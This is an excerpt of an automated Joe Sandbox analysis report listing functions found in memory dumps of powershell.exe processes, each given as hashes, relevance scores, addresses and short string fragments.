API String ID: 0-2886413773
Opcode ID: 07d1d15ec66b7fe2f3ab6e96bfe8479ff83a0ebdc1fcbc3d2ae85513bdf0bfbd
Instruction ID: d3c56242070cecff1ea7959cc393d6c60f2bf080558ffcd31f100525370253e0
Opcode Fuzzy Hash: 07d1d15ec66b7fe2f3ab6e96bfe8479ff83a0ebdc1fcbc3d2ae85513bdf0bfbd
Instruction Fuzzy Hash: BE5123B1E00308DBDB14DF9AC895BDEBBB5BF48710F14812AE419AB254DB74A946CF90

Function 04F34098 Relevance: .4, Instructions: 373COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2132347364.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a58406cdcb1610490e6532f11b350ab6d11b3c2503d65f99d83679075bb2d03
Instruction ID: bd99b78ddc3825d8d2a3c3c315124e5c9c7d7b9d7117d8703c697e5a2a380206
Opcode Fuzzy Hash: 1a58406cdcb1610490e6532f11b350ab6d11b3c2503d65f99d83679075bb2d03
Instruction Fuzzy Hash: B2F13C34A00248DFCB15CF98D584AAEBBF2FF89315F248559E805AB365C735EC82CB90

Function 04F33870 Relevance: .3, Instructions: 317COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2132347364.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f425d67b825b6bfc0a8e227929cca82e9f3cf636565d930160fd7a72001ebc84
Instruction ID: d5a7b3243d123db7101fc6bd96c85d60e2821341ae9815cb648aa7a1bd7ad893
Opcode Fuzzy Hash: f425d67b825b6bfc0a8e227929cca82e9f3cf636565d930160fd7a72001ebc84
Instruction Fuzzy Hash: 06D1F434A01219EFDB05DF98D584AADFBB2FF88315F248159E805AB365C735ED82CB90

Function 04F3CB6C Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2132347364.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66097a7b4d0b1ebdea9220ea6ea72a64409bc261cd8bf5862c59e8f785bc89b0
Instruction ID: 30f1788484eaf8d58604f4949e0881e974cbfd254122b7b3313af620816d29b4
Opcode Fuzzy Hash: 66097a7b4d0b1ebdea9220ea6ea72a64409bc261cd8bf5862c59e8f785bc89b0
Instruction Fuzzy Hash: 03B17C72E00289CFDB10CFA9C8857DDBBF1BF48745F148529E814B7294EB74A882DB91

Function 04F3D43E Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2132347364.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfaab902b34d4d9b4b1f37580bcc5ad3dbfd827445ccc121f2a5ec519df538ef
Instruction ID: 96a4117a734a46333c7d67fbb2ec2da2050fad8874e536c93f30fc0c35874ffd
Opcode Fuzzy Hash: bfaab902b34d4d9b4b1f37580bcc5ad3dbfd827445ccc121f2a5ec519df538ef
Instruction Fuzzy Hash: 29B16E70E00209CFDB14CFA8C98579DBBF1BF48715F148529E819EB254EB74A886CF91

Function 04F32FF0 Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2132347364.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2a0c59d00696e0b40b3238c1a6671f49a1f3776f863b1d432739fc35b56000b
Instruction ID: 1e47f145cfcdc47f60eee04ac11c48c65d477c3c9211a7ff17833ec72d78a8df
Opcode Fuzzy Hash: c2a0c59d00696e0b40b3238c1a6671f49a1f3776f863b1d432739fc35b56000b
Instruction Fuzzy Hash: A4A17E70A00205CFCB05CF9DC5949AEBBB2FF89315B2485A9D955AB365C735FC82CBA0

Function 07A71AD8 Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2136171280.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4869a19b13ce4dfee473cd94e0fbd25e4adcef3d770db010ab35a203171a91f
Instruction ID: 33d10cc4256dc10145d003b5e1b0746493d56db8e4d0884adbf22f721633efa8
Opcode Fuzzy Hash: e4869a19b13ce4dfee473cd94e0fbd25e4adcef3d770db010ab35a203171a91f
Instruction Fuzzy Hash: CD916EB4B10209DFCB14CB98C994AA9BBF6EFC9314F148069D815AB355CB32DC46CF91

Function 07A71ABF Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2136171280.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2827a6a3dab62f76805eb3c4284308c939bc660175596d2f364226dcb8e7b0af
Instruction ID: 2c3deb5189457636d941bb7b5c099b59d645b77ce1c13cc9d5098cce04370ebd
Opcode Fuzzy Hash: 2827a6a3dab62f76805eb3c4284308c939bc660175596d2f364226dcb8e7b0af
Instruction Fuzzy Hash: 8F912BB4A10209DFCB14CF98C994AA9BBF2EFC9314F198099D815AB355C732EC45CFA1

Function 04F3D1C0 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2132347364.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9634f7098178eb8f23f1120c43c535d1923bddf2df3e301f0f9dfc8ea9264b49
Instruction ID: 59cf9197254d31feb45eb9cdccd5be3a12fdcc5ce8917f4b8cd3764f546ea6c1
Opcode Fuzzy Hash: 9634f7098178eb8f23f1120c43c535d1923bddf2df3e301f0f9dfc8ea9264b49
Instruction Fuzzy Hash: 32715BB1E00209DFEB14CFA9C98579EBBF2FF88315F148529E415A7254EB74A842CF91

Function 04F3D1B4 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2132347364.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85a5eefd702433df607b79bcfbf68ab81c87789d7fd9c75bcf76f3f85eb4a17b
Instruction ID: eeef1bacfbc1c9e3afdfb99a7f1dc1eaa859d083b08f1585485d697f33cce7a6
Opcode Fuzzy Hash: 85a5eefd702433df607b79bcfbf68ab81c87789d7fd9c75bcf76f3f85eb4a17b
Instruction Fuzzy Hash: 3F7149B0E00209DFEB14CFA9C9857DEBBF1EF88715F148529E415AB254EB74A842CF91

Function 07A7160F Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2136171280.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24ff79242ba836a742953a2bcd745e5aecd92f0e1e1e7821f62917d416fbd6c3
Instruction ID: 1ed316a7a1ba5402352f9a5e4dbb67f807e6df4e3406eadd9009b20d9fb2dbd1
Opcode Fuzzy Hash: 24ff79242ba836a742953a2bcd745e5aecd92f0e1e1e7821f62917d416fbd6c3
Instruction Fuzzy Hash: 1941E2F0B1020A9FCB149F68CD40A6E77E6ABC5604F588464D621DF250DB31DD49CFE2

Function 04F3406D Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2132347364.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0140d0e6edff4ac864473241cee7293652fd50c4b7c9b45da9c37962d357669
Instruction ID: 232dba7dbe934b99a14589249332aabfca1c00497358984bbc33a2b66be0ac04
Opcode Fuzzy Hash: b0140d0e6edff4ac864473241cee7293652fd50c4b7c9b45da9c37962d357669
Instruction Fuzzy Hash: 1341B474A04644CFCB15CF5CC9949AEBBB1FF8A310B248599D855EB3A6C331EC41CBA0

Function 07A715F7 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2136171280.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9dfa925019595b066f9563149d3cefa3724ecf009b746d7e10502565dd4a006
Instruction ID: c0cf6097a10369570f952ee53d427a1dd77b42bb85db4e1928e0f775610fb0cc
Opcode Fuzzy Hash: e9dfa925019595b066f9563149d3cefa3724ecf009b746d7e10502565dd4a006
Instruction Fuzzy Hash: BE314CF17142059FCB145B64CD90A3D37E7ABC2204F4C84A5D911CF2A2DE25DD49CBE2

Function 04F33100 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2132347364.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f47a2c4dba0ffa13f9f8b6775584070f21785ea3b422fd860bbb4ee2f76ed048
Instruction ID: 852e481fab977d1bc61b944093a53678b06d9cbe505a0f40fd1ae18e9e9f5497
Opcode Fuzzy Hash: f47a2c4dba0ffa13f9f8b6775584070f21785ea3b422fd860bbb4ee2f76ed048
Instruction Fuzzy Hash: FE414874A002059FCB05CF98C5989AEFBB1FF48311B158699D815AB364C732FD91CBA4

Function 04F3AC8E Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2132347364.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa8e00a4d28e429a091455c61feaf417c3d81bf3fb28c5da613fb1ff35e05440
Instruction ID: 01f2ad9bbd3fd3e3f72ededf8f72246d9d6612b66e202e3f8996a8ef84f61ba9
Opcode Fuzzy Hash: fa8e00a4d28e429a091455c61feaf417c3d81bf3fb28c5da613fb1ff35e05440
Instruction Fuzzy Hash: A341D1B0D00349DFDB14DFA9C584ADEBFB5EF48314F148029E819AB264DB75A946CF90

Function 04F39D40 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2132347364.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7de27eb759e9f6f0518e49ab173dfe4fc0c6990c607c05dab7b870ecbd19444b
Instruction ID: 464354c3ec0b04a37c67baefa0b26d14ad23d19795ada3ab46b619b2ab708994
Opcode Fuzzy Hash: 7de27eb759e9f6f0518e49ab173dfe4fc0c6990c607c05dab7b870ecbd19444b
Instruction Fuzzy Hash: 94312C34B012188FCB25DB64D894AEEB7F2BF49305F1045E9D40AAB355CB75AE82CF91

Function 04F3AC98 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2132347364.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d15f3ba862aa26bfc6cdaca238674d59b57ef7025166d573f619c42dcd7fadb
Instruction ID: 89f8050429064079c32a7b2eb1fa2ed55b3f525dd066d2e3397c4ef17a5d8dd0
Opcode Fuzzy Hash: 1d15f3ba862aa26bfc6cdaca238674d59b57ef7025166d573f619c42dcd7fadb
Instruction Fuzzy Hash: 4241EEB0D00348DFDB14DFAAC584ADEBFB5EF48314F148029E819AB254DB75A986CF90

Function 04F33862 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2132347364.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c79fb572ede73e0369b0bb4dcb03f2d546c40e43e55833c912d93cdde0d5699d
Instruction ID: a8fbeb51f3822f27352cc57f772b291cf1f62090e8c96eeb28a2f74ea95f0365
Opcode Fuzzy Hash: c79fb572ede73e0369b0bb4dcb03f2d546c40e43e55833c912d93cdde0d5699d
Instruction Fuzzy Hash: 75211674A00209DFCB04CF99C9809AAFBB5FF49310B1581A9E909EB761C731FC91CBA0

Function 04F3CE63 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2132347364.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 466dfa7ee34b341a356e2b2fb7d72f1c5d757643f71bcbe9281b7b1688f991b5
Instruction ID: 27ea16230ec093f17199e19e62bc8f659c29f7fefeb41cb01b2368a6ff1a6983
Opcode Fuzzy Hash: 466dfa7ee34b341a356e2b2fb7d72f1c5d757643f71bcbe9281b7b1688f991b5
Instruction Fuzzy Hash: CA119372D00188DFEF34EAA4D9987ECB772AF5531FF14142AC001B61A4EB7568CACB16

Function 031AD006 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2131859990.00000000031AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 031AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_31ad000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4e82dd6358a82d08b1d5e80110f8095ed6e3141dfdf221310b39be528dc303c
Instruction ID: 389deb80652f51234324965ba02a17be4a85ab6f9949ee40fab4f65b06aaf253
Opcode Fuzzy Hash: f4e82dd6358a82d08b1d5e80110f8095ed6e3141dfdf221310b39be528dc303c
Instruction Fuzzy Hash: F201A96100D7C09FD7138B299D98652BFA8EF57224F0D84CBE8888F2A7C2685845CB72

Function 031AD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2131859990.00000000031AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 031AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_31ad000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f19d5a8f885083d03e4eeba5d67f5d60df4d44eb7ae6b3b3643c837f414ca3bd
Instruction ID: 6a82cd7aad838a2c84b3c585fb2738625ff70149c6d684d26dbddc2b7726d87f
Opcode Fuzzy Hash: f19d5a8f885083d03e4eeba5d67f5d60df4d44eb7ae6b3b3643c837f414ca3bd
Instruction Fuzzy Hash: 4701F775004F409BD720CA2DDA84B67FF9CEF8A725F1CC469ED480A646C3799841DAB1

Function 04F3ED71 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2132347364.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 273e935bc4e983d0c3704d6d773b74d74540f7f26fcdb5dda4b63e03cc9b6849
Instruction ID: 1281b1d3dc6b47aaddb73faeb387fe694157dac047822e22d6595731f9415af3
Opcode Fuzzy Hash: 273e935bc4e983d0c3704d6d773b74d74540f7f26fcdb5dda4b63e03cc9b6849
Instruction Fuzzy Hash: 79E0EDB5D0420A9F8F44DFB990011BEBBF4AB88200B00887B9829E2340E6355541CFD5

Function 04F3ED80 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2132347364.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebd2a1aebec71765c5e4892e6aded3b829559e3e4aff21576f30e9c5805a44ec
Instruction ID: 3571c8999959fd321f6f057f351781adf28f9511f42d8a47b17e90b70d709c64
Opcode Fuzzy Hash: ebd2a1aebec71765c5e4892e6aded3b829559e3e4aff21576f30e9c5805a44ec
Instruction Fuzzy Hash: 67E026B5E0520E9F8F48DFB995421BEFBF5AB48201F1085AF9819E3340E63456518F95

Function 04F3ED40 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2132347364.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14accbe4ee700896abfffd4bff4cee2068a420a5a5fba923c0018eaab3e129fc
Instruction ID: 6e31d27fb9629820ebb137bea783376730888c5feffd4673d52b919ed370b984
Opcode Fuzzy Hash: 14accbe4ee700896abfffd4bff4cee2068a420a5a5fba923c0018eaab3e129fc
Instruction Fuzzy Hash: 57D0A720C8C787ABD31E9360B40D320BF64BF01206F4810C2E54909093D7983091D252

Non-executed Functions

Function 04F3C830 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2132347364.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a470e17251b0740268a2b218b95b687b2850fd15a32ef497c7dc87c2a72fd87
Instruction ID: 9c1c406831cc1041d4cd4f6d1481ee511f1edb75e059b54e3fbbf719a55c8d96
Opcode Fuzzy Hash: 8a470e17251b0740268a2b218b95b687b2850fd15a32ef497c7dc87c2a72fd87
Instruction Fuzzy Hash: 04918E72E002499FDF10CFA9C99179EBBF2AF88315F148529E405F7254EB74A886CB91

Function 07A70258 Relevance: 10.4, Strings: 8, Instructions: 438COMMON

Download Yara Rule

Strings

4'jq, xrefs: 07A70301
4'jq, xrefs: 07A702F5
4'jq, xrefs: 07A70777
4'jq, xrefs: 07A7044E
4'jq, xrefs: 07A7045A
4'jq, xrefs: 07A70783
tPjq, xrefs: 07A706B0
tPjq, xrefs: 07A706BC

Memory Dump Source

Source File: 00000002.00000002.2136171280.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a70000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$tPjq$tPjq
API String ID: 0-1712124786
Opcode ID: 2b5d23c71620f0743b2218fd5caa7bdd50392da5a2410599b5659bb75fb215df
Instruction ID: b10fde485ca920647aa488ea9e6b74f0c9379a6d0b18acac099c97595c38c03c
Opcode Fuzzy Hash: 2b5d23c71620f0743b2218fd5caa7bdd50392da5a2410599b5659bb75fb215df
Instruction Fuzzy Hash: BDE1E2B1B00205DFCB249F68CD146ABBBB6FFC9310F1480AAD9259B291DB31DD45CBA1

Function 07A7184C Relevance: 6.3, Strings: 5, Instructions: 82COMMON

Download Yara Rule

Strings

$jq, xrefs: 07A71878
$jq, xrefs: 07A71894
$jq, xrefs: 07A718B0
tPjq, xrefs: 07A71914
$jq, xrefs: 07A718CF

Memory Dump Source

Source File: 00000002.00000002.2136171280.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a70000_powershell.jbxd

Similarity

API ID:
String ID: tPjq$$jq$$jq$$jq$$jq
API String ID: 0-2650090061
Opcode ID: 86adfb1a72c1a541947d506daaa6d57245d86efff7219baea886a3deda12556b
Instruction ID: 7ebe9670c62c1ea764809eed8aaf188bae5a250e7be2310e52cc4627a796fd31
Opcode Fuzzy Hash: 86adfb1a72c1a541947d506daaa6d57245d86efff7219baea886a3deda12556b
Instruction Fuzzy Hash: 6C21D6F6A14319CFDB248F64CD40A76BBF5EFC2612F18419AE8649B291C731DD44C762

Function 07A713C3 Relevance: 5.1, Strings: 4, Instructions: 51COMMON

Download Yara Rule

Strings

4'jq, xrefs: 07A7142B
$jq, xrefs: 07A7140A
$jq, xrefs: 07A71416
4'jq, xrefs: 07A71437

Memory Dump Source

Source File: 00000002.00000002.2136171280.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a70000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$$jq$$jq
API String ID: 0-1496060811
Opcode ID: 909781c4dcf0244113adfe2d175c10541811f39e8fc1576463c888aa8ecf659e
Instruction ID: 5bba68bce7857f6d7845b083755c1b9ad122dc2db7e7512e6b9cef18c1ae0b3a
Opcode Fuzzy Hash: 909781c4dcf0244113adfe2d175c10541811f39e8fc1576463c888aa8ecf659e
Instruction Fuzzy Hash: 3601DFA171E3994FC72B1B385C205A66FB69FC352031901DBD4A0DF2A7DA194D4AC3A7

Analysis Process: powershell.exePID: 3784, Parent PID: 6396COMMON

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	18.2%
Total number of Nodes:	44
Total number of Limit Nodes:	4

Executed Functions

Function 0898C1F2 Relevance: 17.4, Strings: 13, Instructions: 1172COMMON

Download Yara Rule

Strings

$jq, xrefs: 0898C493
$jq, xrefs: 0898CAD1
4, xrefs: 0898CBD5
$jq, xrefs: 0898CB3A
QY!, xrefs: 0898C8D9
$jq, xrefs: 0898C6F7
$jq, xrefs: 0898C483
,nq, xrefs: 0898CCBA
$jq, xrefs: 0898CB2A
$jq, xrefs: 0898CAE1
$jq, xrefs: 0898C707
$jq, xrefs: 0898C647
$jq, xrefs: 0898C657

Memory Dump Source

Source File: 00000004.00000002.2953289967.0000000008980000.00000040.00000800.00020000.00000000.sdmp, Offset: 08980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8980000_powershell.jbxd

Similarity

API ID:
String ID: ,nq$4$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$QY!
API String ID: 0-2820247831
Opcode ID: ede423a2b2d5460265efff8a3a8292043ccc1c7542756d9e699a6b7b1465fd83
Instruction ID: 640092402a085d700cc8fdff333e3f9c9f61f6142730b825f3a8e4c7c638444b
Opcode Fuzzy Hash: ede423a2b2d5460265efff8a3a8292043ccc1c7542756d9e699a6b7b1465fd83
Instruction Fuzzy Hash: D7B23874A00219CFDB54EFA8C984BADB7B6BF48305F148199E505AB3A5DB70EC81CF60

Function 0898C527 Relevance: 8.0, Strings: 6, Instructions: 495COMMON

Download Yara Rule

Strings

$jq, xrefs: 0898CAD1
$jq, xrefs: 0898CB2A
4, xrefs: 0898CBD5
$jq, xrefs: 0898C647
$jq, xrefs: 0898C6F7
,nq, xrefs: 0898CCBA

Memory Dump Source

Source File: 00000004.00000002.2953289967.0000000008980000.00000040.00000800.00020000.00000000.sdmp, Offset: 08980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8980000_powershell.jbxd

Similarity

API ID:
String ID: ,nq$4$$jq$$jq$$jq$$jq
API String ID: 0-3947795074
Opcode ID: 5a1a93e424118f2ad4e60a8f29ee4368fe15ad13fe95f4e525a94b224fe054db
Instruction ID: 54e27bdd0ca71513e78bc536eae4d197ade178c7dbd5e9cb8bc2f5c2784ff1df
Opcode Fuzzy Hash: 5a1a93e424118f2ad4e60a8f29ee4368fe15ad13fe95f4e525a94b224fe054db
Instruction Fuzzy Hash: 61220A74A00215CFDB64EF64C984BADB7B6BF48309F1481A9E509AB3A5DB31DD81CF60

Function 08987E38 Relevance: 3.0, Strings: 2, Instructions: 463
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Tejq, xrefs: 08988214
3_7, xrefs: 0898818A

Memory Dump Source

Source File: 00000004.00000002.2953289967.0000000008980000.00000040.00000800.00020000.00000000.sdmp, Offset: 08980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8980000_powershell.jbxd

Similarity

API ID:
String ID: 3_7$Tejq
API String ID: 0-1962622589
Opcode ID: c7f1c87ac422c94a016a4bc05743baaf09aedcae869a8b141f1f089dc1c62475
Instruction ID: 59900f7ce2e4bfd10d12c0a018885d5f2cb197455ff45dfc46fa7429563932d8
Opcode Fuzzy Hash: c7f1c87ac422c94a016a4bc05743baaf09aedcae869a8b141f1f089dc1c62475
Instruction Fuzzy Hash: 94223370E01219CFDB64EF69D884B9ABBF2FB89301F1080AAD50DA7255DB34AD85CF51

Function 08987E78 Relevance: 3.0, Strings: 2, Instructions: 452
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Tejq, xrefs: 08988214
3_7, xrefs: 0898818A

Memory Dump Source

Source File: 00000004.00000002.2953289967.0000000008980000.00000040.00000800.00020000.00000000.sdmp, Offset: 08980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8980000_powershell.jbxd

Similarity

API ID:
String ID: 3_7$Tejq
API String ID: 0-1962622589
Opcode ID: 388e0a6480878bc5ae65bea38f15599360e123387e956609d25eece337d8a68c
Instruction ID: 5cafe545e0b177abeba9e7cbc3185df219f9b0cc0b0ab118b6647d1cafc5be7f
Opcode Fuzzy Hash: 388e0a6480878bc5ae65bea38f15599360e123387e956609d25eece337d8a68c
Instruction Fuzzy Hash: AF122170E0521ACFDB64EF69D884BAAB7F2FB89301F1080A9D50DA7255DB30AD85CF51

Function 07277F00 Relevance: 1.8, APIs: 1, Instructions: 316
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.2945228653.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1898e15109806c45e824575038407f21e4e77a4a3b0eb4931f5fc4d40b16c0e7
Instruction ID: 0ceea27b2dfc2989c931ee1bbacbe3c89ceb32a2f3c227d108ca2056490070b4
Opcode Fuzzy Hash: 1898e15109806c45e824575038407f21e4e77a4a3b0eb4931f5fc4d40b16c0e7
Instruction Fuzzy Hash: 4DD12B70E1061ADFDB21DFA9C584A9DFBB1FF88314F248259E818AB351C770A985CF81

Function 073F8A5A Relevance: 1.6, APIs: 1, Instructions: 55nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 073F8ACE

Memory Dump Source

Source File: 00000004.00000002.2946000066.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73f0000_powershell.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 94c2e97dd48ed2c782109a636e3db837c7cb0693caaa1e618d0bd99079cc62ff
Instruction ID: 007367f73a7a095e59f268d44e79e4b0aa5142c2844af0373eed522a3712ea2f
Opcode Fuzzy Hash: 94c2e97dd48ed2c782109a636e3db837c7cb0693caaa1e618d0bd99079cc62ff
Instruction Fuzzy Hash: A61106B1D012498EDB14DFAAC584AEFFBF4EF48320F14842AD519A7250CB799944CFA1

Function 073F8A60 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 073F8ACE

Memory Dump Source

Source File: 00000004.00000002.2946000066.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73f0000_powershell.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 3f3712634d04c908128d639af9bb941d8187a5fa11d2c3924181486aebe12ba6
